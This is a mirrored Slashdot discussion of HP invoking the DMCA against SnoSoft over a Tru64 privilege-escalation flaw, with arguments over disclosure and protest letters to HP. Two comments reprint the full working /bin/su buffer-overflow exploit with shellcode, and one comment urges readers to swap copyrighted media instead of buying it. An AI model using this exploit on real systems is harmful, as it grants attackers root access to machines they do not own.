Slashdot Mirror


HP Uses DMCA To Quash Vulnerability Publication

Several readers wrote in to note that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft, who found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

30 of 603 comments

  1. Crazy/stupid by SkipToMyLou · · Score: 1, Interesting

    Wouldn't this be similar to M$ deciding to sue virus writers for exposing security flaws in Windows? It's awful that companies have decided to start prosecuting anything, even when people are just trying to help. It is ending the hobbyist mentality that helped produce such quick innovation over the last thirty-some years.

  2. C-Net news better look out! by piznut · · Score: 2, Interesting

    Simply linking to the source code, like they are, could get them into trouble, could it not?

    http://deepmagic.securify.org.uk:8080/su.c

  3. Excerpt from the CNet article by zaren · · Score: 3, Interesting

    "On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "

    Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

    --
    Come to the University of Mars! Classes starting soon!

    1. Re:Excerpt from the CNet article by dnoyeb · · Score: 4, Interesting

      Yes, HP could possibly assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...

  4. If you want to complain... by Anonymous Coward · · Score: 1, Interesting

    It appears that Mr. Ferson's current e-mail address is kent.ferson@compaq.com.

    Just a suggestion...

  5. DL & P2P it by gearheadsmp · · Score: 2, Interesting

  6. as a Tru64 admin... by Corgha · · Score: 4, Interesting

    This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

    Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

    Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

    It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.

  7. So This is the, "New HP?" by ewhac · · Score: 4, Interesting

    HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

    As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

    Schwab

  8. Re:let me see if I get this right by xigxag · · Score: 3, Interesting

    HP should be thanking them

    This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.

    --
    There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.

  9. Do you mean this source code? by User+956 · · Score: 4, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    main(int argc, char *argv[]) {
    int i, j; char buffer[8239]; char payload[15200];
    char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i<8233;i++) buffer[i] = 0x41;

    buffer[i++] = 0x01; buffer[i++] = 0x04;
    buffer[i++] = 0x01; buffer[i++] = 0x40;
    buffer[i++] = 0x01;

    for (i=0;i<15000;) { for(j=0;j<4;j++) { payload[i++] = nop[j]; } }
    for (i=i,j=0;j<sizeof(shellcode);i++,j++)payload[i] = shellcode[j];
    printf("/bin/su by phased\n");
    printf("payload %db\n", strlen(payload));
    printf("buffer %db\n", strlen(buffer));
    execl("/usr/bin/su", "su", buffer, payload, 0);
    }

    --
    The theory of relativity doesn't work right in Arkansas.

  10. Re:DMCA Violation? by buss_error · · Score: 4, Interesting

    And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

    It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

    The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

    If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

    Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

    OK, so I'm a broken record.

    --
    Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.

  11. Subtle attack on the DMCA? by aebrain · · Score: 3, Interesting

    Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

    --
    Zoe Brain - Rocket Scientist

  12. Dear Ms. Fiorina by Gerdts · · Score: 5, Interesting

    Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm

    I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

    The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

    The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

    Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

    I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

  13. Re:DMCA Bad by ealar+dlanvuli · · Score: 2, Interesting

    s/decade/bicential/

    DMCA is about the cessation of the exchange of *PUBLIC IP* that happens to interact with private IP. The fact that it exists to destroy the "marketplace of ideas" that our country was partially founded on makes it reprehensible. The fact that it only affects a certain sector of this market is a nonissue, because the removal of any PUBLIC IP for the good of anything is "Un-American", and I'd even be so far-fetched as to say it's Un-Democratic.

    How? Follow this example; while it is the extreme, it clearly shows where we are today. A new law about computer security is being discussed in congress, and they bring in some experts to share the current state of exploits. The sharing of that specific knowledge in order to allow a more informed decision by the congress would in itself be illegal. Not because the information is under an acute monopoly, but because that information is illegal in this country. I repeat, that information (Remember, this information is PUBLIC IP) is *ILLEGAL IN THIS COUNTRY*.

    For another example, imagine that a different law was under debate, a law that had some effect on "pirating" and "hacking"; this law required a complete review of the current laws in the area, and their usage. If this case goes to court, all of the records pertaining to the security vulnerability will be secured legally, not just under the DMCA anymore. Congress would be unable to discuss the specifics of this vulnerability, and make an informed decision about what new laws need to be passed.

    In both of these situations, information that is clearly PUBLIC IP has been removed from the reach of our lawmakers, causing them to make less than perfect decisions. This is clearly a hindrance on democracy, and obtains that status by disrupting the free trade of public information. This information was deemed unacceptable to exist, and therefore it became illegal to share it. No other possible subset of information not covered under contractual/patent law is so bound in our free country; that makes this the first time in 2 centuries that an idea has been censored for being bad to a patent holder. (ed: sorry weak tie there, couldn't think of a better one)

    I believe I have upheld my value of the marketplace of ideas, and shown that by limiting democracy a free marketplace is unable to exist.

    --
    I live in a giant bucket.

  14. Re:Bruce, it's time for you to make a decision by ChaosDiscord · · Score: 5, Interesting

    I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

    The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge freedom of speech or of the press.

    "The only law shalt be maximize your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. This is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.

    I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.

  15. My mail to Carly by CrayDrygu · · Score: 4, Interesting

    Mrs Fiorina,

    I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

    Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

    Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

    This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

    I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.

    Looking forward to your response.

    [Name Removed]

    --
    "I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett

  16. Re:Bruce, it's time for you to make a decision by Anonymous Coward · · Score: 1, Interesting

    Hey!

    1 - US takes up capitalism.
    2 - US fucks up capitalism with personal greed (or human nature, if you're that way inclined)
    3 - people blame US for perverting capitalism

    OK, now that's fine, I have no problem with that, BUT:

    1 - Russia takes up communism
    2 - Russia fucks up communism (or human nature, if you're that way inclined)
    3 - US blames RUSSIA and RUSSIANS who are EVIL FUCKING COMMUNISTS and bla bla bla, and put out screeds and screeds of propaganda, to the point where people in the US *STILL* point at Russia to say "communism doesn't work".

  17. This is a marketing disaster for HP. by Futurepower(R) · · Score: 5, Interesting

    Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

    This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irreparable damage to HP.

    We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

    It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.

    1. Re:This is a marketing disaster for HP. by Bruce+Perens · · Score: 5, Interesting

      Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

      Bruce

  18. Re:Bruce Perens by Bruce+Perens · · Score: 4, Interesting

    I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

    My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

    Thanks

    Bruce

  19. I need your call on this, please, folks. by Bruce+Perens · · Score: 4, Interesting

    Folks,

    In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:

    Our advisory release policy is full disclosure unless bound by contract.

    Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

    I would hate to be manipulated in a shakedown of my own company.

    On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

    What do you think?

    Bruce

    1. Re:I need your call on this, please, folks. by Bruce+Perens · · Score: 5, Interesting

      I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

      Bruce

    2. Re:I need your call on this, please, folks. by _Sprocket_ · · Score: 3, Interesting

      It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

      How are contracted researchers expected to behave in such a situation?

      It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarrass the producer of that product to action - patching the current issue and perhaps increasing future quality control.

      What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

      But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilemma. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

      Unless, of course, they're in the business of the shake-down.

    3. Re:I need your call on this, please, folks. by snosoft · · Score: 2, Interesting

      In response to Bruce:

      "But that sentence sounds a bit like a shakedown, doesn't it?"

      Secure Network Operations provides system security research results to both the public and private sectors in a mutually exclusive manner. We perform independent research and maintain a full disclosure policy for such engagements. We also perform custom security research for private enterprises and government whereby disclosure is limited to our client, and bound by NDA.

      We have also changed our page.

      Regards,
      Adriel T. Desautels
      Founder, Secure Network Operations, inc.

  20. Re:Bruce Perens by Bruce+Perens · · Score: 5, Interesting

    People really resist the phone. Lots will reply to me here. A few will email. None will call. No kidding. That number has been on my web page for a year, and the calls I get are from the press, and the occasional Nigerian money-laundering scam.

    Bruce

  21. Lets try this again... by User+956 · · Score: 5, Interesting

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[]=
    "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
    "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

    main(int argc, char *argv[]) {
        int i, j;
        char buffer[8239];
        char payload[15200];
        char nop[] = "\x1f\x04\xff\x47";

        bzero(&buffer, 8239);
        bzero(&payload, 15200);

        for (i=0;i<8233;i++)
            buffer[i] = 0x41;

        /* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

        for (i=0;i<15000;) {
            for(j=0;j<4;j++) {
                payload[i++] = nop[j];
            }
        }

        for (i=i,j=0;j<sizeof(shellcode);i++,j++)
            payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", strlen(payload));
        printf("buffer %db\n", strlen(buffer));

        execl("/usr/bin/su", "su", buffer, payload, 0);
    }

    --
    The theory of relativity doesn't work right in Arkansas.

  22. DMCA / McCarthy-style accusations. by oakbox · · Score: 2, Interesting

    Okay, what's to keep one company from slandering another company without any proof? What if Corp A announces that they have found a very destructive hole in Corp B's software, rendering it totally open to attack, but Corp A cannot release this information because of the DMCA.
    Stay with me here: What if there is no vulnerability? Even if Corp B asks Corp A to do so, Corp A can (correctly) claim that they are not allowed to release the information under DMCA. Corp B can't find the vulnerability to fix it. Corp B cannot effectively defend its reputation because the exact charges are not known.
    - oakbox

    --
    Not just answers, the correct questions.

  23. Re:Bruce Perens by 0xA · · Score: 4, Interesting

    Bruce,

    I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

    I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

    As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information; given the nature of many of the parties involved, I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly, the situation gets complicated; the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light; I suspect that the group has acted in bad faith, or at least that "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

    However, the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on its head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are exploiting; that cannot be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine; I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them, then that is what I will do.

    Regardless of the events leading to Mr. Ferson's letter to SnoSoft, HP must clarify their position on this situation. I would hope that you are willing to state that, provided no illegal methods were used to discover the vulnerability, HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breach of contract, it is a matter for the civil courts.

    Aaron Schneider
    Manager, Information Technology
    Fabutan Sun Tan Studios
    Schneider@fabutan.com

  24. Re:Who's laughing at Alan Cox now? by Rohan427 · · Score: 2, Interesting

    Just to show that I put my money where my mouth is, and the possibilty that from leading by example others will follow, here's the letter I wrote to the HP CEO (it may never actually get read, and may get ignored, but at least I tried :)

    "First of all, I'd like to say that my product experience with HP and Compaq products has varied. Over all, Compaq products leave a lot to be desired, and though I like and used to recommend HP printers and other peripherals to clients, their reliance upon specific Microsoft software for installation is rather maddening.

    Recently it has come to my attention that HP is in some fashion using the DMCA to suppress the reporting of valid security holes in some of its software. As a computer and security professional of over 24 years, I must say that this policy, as well as the DMCA itself, is severely flawed. A customer has a right to know what they are purchasing and in this case they have the right to know if their data is secure. They also have the right to make certain it is secure by any means possible. As a company providing important software (and hardware) to customers, not the least of which are large corporations, you have an obligation to see to it that the software and hardware you sell them is secure, to the best of your abilities. This obligation must not be thrown aside in a pitiful attempt to protect IP rights (or whatever HP is attempting to protect) and put your customers at risk.

    In addition, this type of stance will only hurt HP in the long run, and make HP more of a target for hate and discontent in the PC market. Because of this announcement, I have removed HP from my list of recommended companies and products, as I'm sure many others will as well.

    The DMCA should never have been allowed to pass, as it has only come to hurt the digital industry worldwide, including the portions that large corporations such as yours bank upon. To date, the DMCA and other such laws governing digital media have only been used to suppress the rights of certain individuals, hamper innovation, and slow technological advances to a crawl. In the future, such poorly thought out laws will further damage the industry and assist in the decline of the US and worldwide economy.

    Companies that support these types of laws are not helping themselves, but only hurting themselves. After all, even large corporations such as HP are consumers and must, in the end, abide by the same laws as the consumer.

    I urge you to take the correct and responsible stance of supporting public knowledge of security flaws and fixing any and all those that your products may have. By suppressing such information, you only put your customers at greater risk because by doing so only those who wish to do harm with the information will have it. Those who wish to help secure systems will not, and those that are subject to the attacks will lose billions in lost time and data. As a security professional formerly with a large corporation, I was constantly under the gun to keep our systems secure. If not for the information freely available to me through public venues, my job would have been an impossible one. My company had over 11,000 systems on public networks. Every one of these had to be secure from crackers (also known as a "malicious hacker", which is the REAL term for the media word "hacker"). It was the responsibility of an entire team of people to keep track of current security holes and make sure they were fixed on ALL systems before the crackers could use them. In many cases, the exploits were never reported to us by the software mfg., but by some unrelated party when they posted the exploit to a public web site. In some cases where we actually found the exploit, and reported them to the mfg., we were ignored until we were forced to report it to the public. Once we had reported it, it did nothing for the companies in question but cause hate and distrust from their customers.

    So you see, you can't have your cake and eat it too. You either must take the responsibility for your product up front and honestly, or reap the consequences of your inaction and attempts at hiding (or whatever it is) later. I often feel that lawyers need to be kept out of technological discussions as most of them have no clue in the area. I would be willing to bet, and in fact I have seen evidence of this, that the reason most laws such as the DMCA are passed are due to the number of people in and out of congress who really know nothing about technology. It is the responsibility of those of us who are in the know, to educate those who are not as to what should be done and why. Unfortunately, most of us are either not in a high enough position (e.g. - the CEO of a large corporation) to make our voices heard, don't care to take the responsibility (and instead sit around and bitch about stupid laws), or are in a position to make a statement but have a specific stake in the passage of said laws.

    I would also urge you to take a stance against all such repressive laws regarding technology. Yes, there are legitimate concerns of copyright infringement, piracy, etc., but there are already laws to deal with these issues. There is also something called "fair use", which includes the right to reverse engineer for educational purposes, edification, personal use, and to innovate. We need to see that these laws are enforced properly, and get away from treating the digital realm as if it is of a completely different universe.

    It is a small minority in the digital world that actually steal copyrighted material, and if the suppressive laws continue to roll, that minority will quickly become a majority. Most that actually steal only do it because they are priced right out of the precious markets that the large corporations are trying so hard to protect. As if making several billion a year is not enough, the prices for such products MUST be raised and we MUST be forced to pay for every second of their use.

    PGA
    --
    Paul G. Allen
    Owner, Sr. Engineer, Security Specialist
    Random Logic/Dream Park
    www.randomlogic.com"

    PGA

  25. Re:Who's laughing at Alan Cox now? by Rohan427 · · Score: 2, Interesting

    Upon quickly reviewing the DMCA again, I have found that HP probably has no case whatsoever. The DMCA specifically allows Security Testing and information publication.

    Section 1201(c) states that the DMCA does not circumvent Fair Use.
    Section 1201(f) allows Reverse Engineering.
    Section 1201(g) allows Encryption Research.
    Section 1201(j) allows for Security Testing.

    Several sections allow publishing information.

    I see no references to exceptions for viruses, trojans, worms, etc. written for the purposes of testing and exposing security flaws. In fact, such software seems to be PROTECTED under the DMCA.

    So, I say to HP and all others trying to use the DMCA in this fashion: KMA!!

    Even though the DMCA does NOT prohibit reverse engineering of anything, it has been INTERPRETED in just that way. There are three types of law: the written law, the interpreted law, and case law. To date, the DMCA has not really been used to protect against illegal use of copyrighted material. Instead it has been used to prohibit perfectly legal use of material. As written, the DMCA doesn't prohibit Fair Use and reverse engineering under existing law. As INTERPRETED, at least to date, it does.

    This is one big problem with laws such as this. It's not necessarily the written law that's bad, it's the way it's interpreted. Some laws are written so vaguely that once argued in court, there is a chance that a judge (or jury) will interpret the law incorrectly. This then leads to case law which is later used in support of further rulings on the incorrectly interpreted written law. Some laws are purposefully written poorly so as to make them easily passed and then interpreted to mean something different, or something skewed, from what those who passed them were thinking.

    Often laws are used against those who lack the understanding of said law, and used in a venue that may also lack such understanding, in order to dupe the defendant into submission. I've had this tried on me many times (and most people who've ever gotten a traffic ticket, gone to a family court in CA, or have had to deal with other courts have as well). I am one who does not take even what my own lawyer has to say for granted. I am one who wants to see the text of the law, all references, and who does his own research.

    IANAL, but I am educated and know how to read quite well, and I've spent enough time in court and with lawyers to have done some research into the law as a whole. I've also read the DMCA and copyright law. Apparently (IMHO) either someone at HP hasn't, or they're hoping others haven't.

    PGA
    --
    Paul G. Allen
    Owner, Sr. Engineer, Security Specialist
    Random Logic/Dream Park
    www.randomlogic.com